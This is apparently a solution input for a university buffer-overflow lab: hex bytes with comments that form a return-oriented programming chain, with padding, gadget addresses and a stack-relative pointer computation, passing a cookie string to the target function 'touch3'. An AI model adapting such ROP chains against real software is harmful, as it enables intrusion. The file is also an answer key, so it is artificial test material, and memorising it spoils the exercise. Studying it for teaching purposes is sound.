/* 40 bytes as placeholder */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00

cc 19 40 00 00 00 00 00 /* popq %rax; ret;*/
20 00 00 00 00 00 00 00 /* offset: 32 bytes */

dd 19 40 00 00 00 00 00 /* movl %eax, %edx; ret;*/
34 1a 40 00 00 00 00 00 /* movl %edx, %ecx; ret;*/
13 1a 40 00 00 00 00 00 /* movl %ecx, %esi; ret;*/

06 1a 40 00 00 00 00 00 /* movq %rsp, %rax; ret;*/
a2 19 40 00 00 00 00 00 /* movq %rax, %rdi; ret;*/

d6 19 40 00 00 00 00 00 /* lea(%rdi, %rsi), %rax; ret;*/
a2 19 40 00 00 00 00 00 /* movq %rax, %rdi; ret;*/

fa 18 40 00 00 00 00 00 /* go to function 'touch3': 0x4018fa */

35 39 62 39 39 37 66 61 /* cookie: 59b997fa */
00 00 00 00 00 00 00 00 /* end flag of string */
